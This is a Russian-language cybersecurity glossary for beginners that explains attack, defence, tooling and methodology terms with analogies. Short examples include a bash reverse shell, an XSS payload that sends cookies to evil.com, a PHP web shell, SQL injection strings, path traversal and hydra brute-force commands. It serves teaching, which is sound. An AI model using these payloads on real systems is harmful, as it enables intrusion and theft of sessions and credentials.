📖 Глоссарий кибербезопасности
📌 Зачем этот глоссарий
В кибербезопасности много терминов на английском. Без их понимания невозможно читать отчёты, документацию, CVE-описания и общаться с коллегами. Здесь — самые важные термины с объяснением на пальцах.
🚀 Атака и эксплуатация
Exploit (эксплойт)
Программа или техника которая использует конкретную уязвимость. Это "отмычка" под конкретный замок.
Аналогия: замок с дефектом. Эксплойт — инструмент который знает про этот дефект и открывает замок без ключа.
# Эксплойт для бэкдора в vsftpd 2.3.4
python3 exploit_vsftpd234.py --target 10.0.0.1
Бывают: Remote (по сети), Local (нужен доступ к системе), Web (через HTTP).
Payload (полезная нагрузка)
Код который выполняется после успешной эксплуатации. "Начинка" атаки — то ради чего всё затевалось.
Аналогия: ракета = эксплойт (доставка) + payload (боеголовка). Одна ракета — разные боеголовки.
# Reverse shell — открывает удалённый доступ
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
# XSS — крадёт cookies
<script>fetch('https://evil.com/?c='+document.cookie)</script>
# SQL injection — обходит авторизацию
' OR 1=1 --
Vulnerability (уязвимость)
Слабое место в системе. Баг, ошибка конфигурации, устаревшее ПО.
Аналогия: дырка в заборе. Сама по себе не опасна, но через неё можно пролезть.
Примеры: открытый FTP без пароля, SQL-инъекция в форме логина, Apache с известным багом, SSH с паролем "admin".
Zero-Day (нулевой день)
Уязвимость о которой разработчик ещё не знает. Нет патча, нет защиты. У разработчика было 0 дней на исправление.
Аналогия: дырка в заборе о которой не знает даже хозяин дома.
Zero-day эксплойты стоят на чёрном рынке от $50,000 до $2,500,000.
CVE (Common Vulnerabilities and Exposures)
Стандартный ID уязвимости. Единая нумерация чтобы все говорили об одной дыре.
Формат: CVE-ГОД-НОМЕР
Примеры: CVE-2021-41773 (Apache Path Traversal), CVE-2017-0144 (EternalBlue/WannaCry), CVE-2014-0160 (Heartbleed).
CVSS (Common Vulnerability Scoring System)
Оценка серьёзности уязвимости от 0 до 10. Критическая = 9.0-10.0 (полный контроль). Высокая = 7.0-8.9. Средняя = 4.0-6.9. Низкая = 0.1-3.9.
Пентестеру интересны 7.0+ в первую очередь.
POC (Proof of Concept)
Рабочий пример эксплуатации. Не полноценная атака, а доказательство что дыра реальна.
Аналогия: ты не ломаешь дверь, а показываешь видео как она открывается без ключа.
В пентесте POC — это то что ты прикладываешь к отчёту: "вот доказательство, уязвимость работает".
🐚 Доступ и контроль
Shell (шелл)
Командная строка на удалённой машине. Получить шелл = получить возможность выполнять команды на чужом компьютере.
Аналогия: ты сидишь за клавиатурой чужого компьютера и можешь печатать команды.
# Ты получил шелл если видишь что-то вроде:
root@target:~#
www-data@target:$
Reverse Shell (обратный шелл)
Целевая машина сама подключается к тебе. Обходит фаервол — потому что исходящие соединения обычно не блокируются.
Аналогия: вместо того чтобы ломиться в дверь (которая закрыта на замок), ты просишь человека внутри позвонить тебе.
# На твоей машине — слушаешь
nc -lvnp 4444
# На цели — подключается к тебе
bash -i >& /dev/tcp/ТВОЙ_IP/4444 0>&1
Bind Shell (привязанный шелл)
Цель открывает порт и ждёт твоего подключения. Противоположность reverse shell.
Аналогия: цель оставляет дверь открытой, ты заходишь когда хочешь.
Минус: фаервол обычно блокирует входящие соединения. Поэтому reverse shell используют чаще.
Backdoor (бэкдор)
Скрытый вход в систему который обходит нормальную аутентификацию. Может быть оставлен хакером или даже встроен в ПО.
Аналогия: тайная дверь в стене за книжным шкафом.
Примеры:
- vsftpd 2.3.4 — бэкдор прямо в исходном коде
- Web shell — PHP-файл на сервере для выполнения команд
- SSH-ключ атакующего добавлен в authorized_keys
Web Shell
PHP/ASP/JSP файл загруженный на веб-сервер. Через браузер можно выполнять команды на сервере.
<?php system($_GET['cmd']); ?>
Использование: http://target.com/shell.php?cmd=whoami
Privilege Escalation (повышение привилегий)
Получение большего уровня доступа чем есть. Зашёл как обычный пользователь → стал root/admin.
Аналогия: ты зашёл в здание как посетитель, а потом нашёл ключ от серверной.
Два типа:
- Vertical — user → root (вверх по уровню)
- Horizontal — user1 → user2 (тот же уровень, другой аккаунт)
Lateral Movement (горизонтальное перемещение)
Перемещение между машинами в сети после первоначального взлома. Взломал один компьютер → через него проник на другие.
Аналогия: зашёл в одну комнату → через неё перешёл в соседнюю → потом в следующую.
Persistence (закрепление)
Обеспечение доступа после перезагрузки или обнаружения. Бэкдор, cron-задача, автозапуск — всё что позволяет вернуться.
Аналогия: ты не только проник в здание, но и сделал себе копию ключа.
🔍 Разведка
Reconnaissance / Recon (разведка)
Сбор информации о цели перед атакой. Первый этап любого пентеста.
Passive recon — без контакта с целью. Google, WHOIS, социальные сети, публичные DNS-записи.
Active recon — прямой контакт. Nmap сканирование, обращение к серверу, проверка портов.
OSINT (Open Source Intelligence)
Разведка по открытым источникам. Всё что можно найти без взаимодействия с целью.
Аналогия: детектив изучает человека по его соцсетям, публичным документам и новостям, даже не звоня ему.
Источники: Google, LinkedIn, GitHub, Shodan, WHOIS, утекшие базы данных.
Enumeration (перечисление)
Активный сбор детальной информации. После того как нашёл открытые порты — узнаёшь версии, пользователей, шары, домены.
# Перечисление SMB-шар
smbclient -L //10.0.0.1
# Перечисление пользователей
enum4linux 10.0.0.1
# Перечисление DNS
dig axfr example.com @ns1.example.com
Footprinting
Создание "отпечатка" цели — какие технологии используются, какая инфраструктура, какие точки входа.
Attack Surface (поверхность атаки)
Всё что доступно атакующему. Каждый открытый порт, каждый API-эндпоинт, каждая форма ввода — часть поверхности атаки.
Аналогия: количество окон и дверей в здании. Чем больше — тем больше способов проникнуть.
🛡 Защита
Firewall (фаервол)
Фильтрует сетевой трафик по правилам. Решает что пропустить, а что заблокировать.
Аналогия: охранник на входе со списком кто может войти.
Stateless — проверяет каждый пакет отдельно. Stateful — отслеживает соединения (умнее).
IDS (Intrusion Detection System)
Обнаруживает подозрительную активность и алертит. Не блокирует — только сообщает.
Аналогия: сигнализация в доме. Срабатывает и шумит, но дверь не закрывает.
IPS (Intrusion Prevention System)
IDS + блокировка. Обнаруживает и автоматически останавливает атаку.
Аналогия: сигнализация которая ещё и запирает двери.
WAF (Web Application Firewall)
Фаервол специально для веб-приложений. Фильтрует HTTP-запросы, блокирует SQL-инъекции, XSS, path traversal.
Запрос: GET /page?id=' OR 1=1 --
WAF: ЗАБЛОКИРОВАНО (SQL injection pattern)
Популярные: Cloudflare WAF, ModSecurity, AWS WAF.
Honeypot (ловушка)
Фейковая система которая выглядит как настоящая цель. Привлекает атакующих чтобы изучить их методы.
Аналогия: поддельный сейф в банке. Грабитель тратит время на него, пока настоящий в другом месте.
SIEM (Security Information and Event Management)
Система которая собирает логи со всех устройств в сети и анализирует их. Находит аномалии и корреляции.
Аналогия: центр видеонаблюдения с записями со всех камер здания.
Примеры: Splunk, ELK Stack, QRadar.
🎯 Типы атак
Brute Force (перебор)
Перебор всех возможных паролей пока не найдёшь правильный.
hydra -l admin -P passwords.txt 10.0.0.1 ssh
Аналогия: пробовать каждый ключ на связке пока один не подойдёт.
Dictionary Attack (словарная атака)
Перебор паролей из заранее составленного списка (словаря). Быстрее чем полный перебор.
rockyou.txt — 14 миллионов паролей
password
123456
admin
qwerty
...
Phishing (фишинг)
Обман жертвы чтобы та сама отдала пароль или кликнула на вредоносную ссылку.
Аналогия: поддельное письмо от "банка" с просьбой "подтвердить данные".
Social Engineering (социальная инженерия)
Манипуляция людьми для получения доступа. Phishing — один из видов. Также: звонки, личные визиты, притворство.
Аналогия: вместо взлома двери — убедить охранника что ты "из IT-отдела".
Man-in-the-Middle / MITM (человек посередине)
Перехват трафика между двумя сторонами. Атакующий читает и может изменять данные.
Аналогия: почтальон который вскрывает письма, читает их и заклеивает обратно.
DoS / DDoS (отказ в обслуживании)
Перегрузка сервера запросами чтобы он перестал работать. DDoS — то же самое но с тысяч компьютеров одновременно.
Аналогия: 10,000 человек одновременно звонят на одну телефонную линию — настоящий звонок не проходит.
SQL Injection (SQL-инъекция)
Внедрение SQL-кода через формы ввода. Позволяет читать/изменять базу данных.
Логин: admin' OR 1=1 --
Пароль: что_угодно
Сервер выполняет:
SELECT * FROM users WHERE login='admin' OR 1=1 --' AND pass='...'
→ условие всегда истинно → доступ получен
XSS (Cross-Site Scripting)
Внедрение JavaScript-кода в веб-страницу. Код выполнится в браузере каждого кто откроет страницу.
// Stored XSS — сохраняется на сервере
<script>fetch('https://evil.com/?c='+document.cookie)</script>
// Reflected XSS — в URL
https://site.com/search?q=<script>alert(1)</script>
Path Traversal (обход пути)
Чтение файлов за пределами разрешённой директории через ../.
https://site.com/page?file=../../../../etc/passwd
RCE (Remote Code Execution)
Выполнение произвольного кода на удалённом сервере. Самый опасный тип уязвимости — полный контроль над машиной.
LFI / RFI (Local/Remote File Inclusion)
LFI — чтение локальных файлов сервера через уязвимость. RFI — подключение внешнего файла (с сервера атакующего) и его выполнение.
IDOR (Insecure Direct Object Reference)
Доступ к чужим данным через изменение ID в запросе.
https://site.com/profile?id=123 ← твой профиль
https://site.com/profile?id=124 ← чужой профиль (если нет проверки)
🔧 Инструменты
Metasploit
Главный фреймворк для эксплуатации. Содержит тысячи эксплойтов и payload'ов. Автоматизирует весь процесс: от поиска уязвимости до получения шелла.
Аналогия: швейцарский нож пентестера. Всё в одном.
Burp Suite
Прокси для перехвата и модификации HTTP-запросов. Основной инструмент для тестирования веб-приложений.
Аналогия: прозрачное стекло между браузером и сервером — видишь каждый запрос и можешь его изменить.
Nmap
Сканер портов и сервисов. Определяет что открыто, какие версии, какая ОС. Первый инструмент в любом пентесте.
Nessus
Автоматический сканер уязвимостей. Проверяет тысячи CVE за один скан.
Wireshark
Анализатор сетевого трафика. Показывает каждый пакет в сети. Используется для MITM-анализа, отладки и разведки.
Hashcat / John the Ripper
Инструменты для взлома хешей паролей. Hashcat использует GPU и работает намного быстрее.
Hydra
Брутфорсер для сетевых сервисов: SSH, FTP, HTTP, SMB, RDP и десятков других.
hydra -l admin -P rockyou.txt 10.0.0.1 ssh
Gobuster / Dirb / Ffuf
Перебор директорий и файлов на веб-сервере. Находит скрытые страницы: /admin, /backup, /api, .git.
gobuster dir -u http://10.0.0.1 -w /usr/share/wordlists/dirb/common.txt
Netcat (nc)
"Швейцарский нож" для работы с сетью. Слушает порты, подключается к ним, передаёт данные. Часто используется для ловли reverse shell.
# Слушать порт
nc -lvnp 4444
SearchSploit
Офлайн-поиск эксплойтов в базе Exploit-DB. Встроен в Kali Linux.
searchsploit apache 2.4.49
🏗 Методология
Kill Chain (цепочка атаки)
Этапы атаки от разведки до цели:
- Reconnaissance — разведка
- Weaponization — подготовка эксплойта
- Delivery — доставка (фишинг, эксплойт)
- Exploitation — эксплуатация уязвимости
- Installation — установка бэкдора
- Command & Control — управление через C2-сервер
- Actions on Objectives — достижение цели (кража данных, шифрование)
Pentesting Phases (этапы пентеста)
- Recon — сбор информации
- Scanning — сканирование портов и сервисов
- Gaining Access — эксплуатация и получение доступа
- Maintaining Access — закрепление (persistence)
- Covering Tracks — заметание следов
- Reporting — написание отчёта
Red Team / Blue Team / Purple Team
Red Team — атакующие. Имитируют хакеров, ищут способы проникнуть.
Blue Team — защитники. Обнаруживают и останавливают атаки.
Purple Team — совместная работа красных и синих для максимальной эффективности.
CTF (Capture The Flag)
Соревнование по хакингу. Нужно найти скрытый "флаг" (обычно строку текста) взломав систему или решив задачу.
Аналогия: квест-рум для хакеров. Лучший способ учиться.
Платформы: HackTheBox, TryHackMe, PicoCTF, VulnHub.
Bug Bounty (баг-баунти)
Компания платит деньги за найденные уязвимости в её продуктах. Легальный хакинг за вознаграждение.
Платформы: HackerOne, Bugcrowd, Intigriti.
🔐 Криптография и аутентификация
Hash (хеш)
Односторонняя функция — превращает данные в строку фиксированной длины. Невозможно восстановить исходные данные из хеша.
MD5: 5d41402abc4b2a76b9719d911017c592
SHA256: 2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824
Используется для хранения паролей. Сервер не хранит пароль — хранит его хеш.
Salt (соль)
Случайная строка добавленная к паролю перед хешированием. Защищает от радужных таблиц.
Без соли: hash("password") → одинаковый хеш у всех
С солью: hash("password" + "x7f2k") → уникальный хеш
Encryption (шифрование)
Двусторонняя функция — данные можно зашифровать и расшифровать обратно (с ключом).
Симметричное (AES) — один ключ для шифрования и расшифровки. Асимметричное (RSA) — пара ключей: публичный + приватный.
MFA / 2FA (многофакторная аутентификация)
Проверка личности несколькими способами: пароль + SMS-код, пароль + приложение-аутентификатор.
Даже если пароль украден — без второго фактора не войдёшь.
🌐 Сетевые термины
Port (порт)
Логический адрес для сетевого сервиса. Каждый сервис слушает свой порт.
22 — SSH
80 — HTTP
443 — HTTPS
21 — FTP
445 — SMB
3306 — MySQL
3389 — RDP
Protocol (протокол)
Набор правил общения между устройствами. TCP, UDP, HTTP, DNS, SSH — всё это протоколы.
Proxy (прокси)
Посредник между тобой и целью. Твой запрос идёт через прокси — цель видит IP прокси, не твой.
VPN (Virtual Private Network)
Зашифрованный туннель между тобой и сервером. Весь трафик идёт через него.
Pivoting (пивотинг)
Использование взломанной машины как точки для атаки на другие машины в сети. Ты не можешь достучаться до внутренней сети напрямую — но взломанная машина может.
Аналогия: ты не дотягиваешься до полки → встаёшь на стул → дотягиваешься.
C2 / C&C (Command and Control)
Сервер через который атакующий управляет заражёнными машинами. Бэкдоры подключаются к C2 и ждут команд.
📜 Стандарты и фреймворки
OWASP Top 10
Список 10 самых критичных уязвимостей веб-приложений. Обновляется раз в несколько лет. Пентестер должен знать наизусть.
MITRE ATT&CK
База знаний о техниках атакующих. Описывает ЧТО атакующие делают на каждом этапе. Используется для построения защиты.
NIST
Национальный институт стандартов и технологий США. Публикует стандарты безопасности и фреймворк управления рисками.
PTES (Penetration Testing Execution Standard)
Стандарт проведения пентеста. Описывает этапы, методы, отчётность.